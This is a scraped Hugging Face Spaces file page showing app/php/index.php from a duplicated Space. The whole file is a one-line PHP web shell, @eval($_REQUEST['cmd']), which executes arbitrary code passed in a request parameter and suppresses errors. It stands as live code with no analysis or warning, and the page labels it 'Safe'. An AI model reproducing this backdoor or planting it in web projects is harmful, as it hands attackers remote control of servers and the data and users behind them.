Hugging Face
Models
Datasets
Spaces
Community
Docs
Enterprise
Pricing
Log In
Sign Up
Spaces:
Duplicated from
edwagbb/code
AZLABS
/
code
like
0
Running
App
Files
Files
Community
Fetching metadata from the HF Docker repository...
bcf3870
code
/
app
/
php
/
index.php
edwagbb
Create app/php/index.php
720445b
verified
over 1 year ago
raw
Copy download link
history
blame
Safe
32 Bytes
<?php
@
eval
(
$_REQUEST
[
"cmd"
]);
?>